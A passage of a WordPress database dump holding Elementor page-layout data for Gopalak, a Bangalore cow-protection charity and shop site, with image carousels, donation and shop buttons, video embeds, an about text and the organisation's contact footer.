"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11168,1860,'_elementor_page_assets','a:0:{}'),(11169,1861,'_elementor_edit_mode','builder'),(11170,1861,'_elementor_template_type','wp-page'),(11171,1861,'_elementor_version','3.7.8'),(11172,1861,'_wp_page_template','elementor_canvas'),(11173,1861,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#43693F\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s 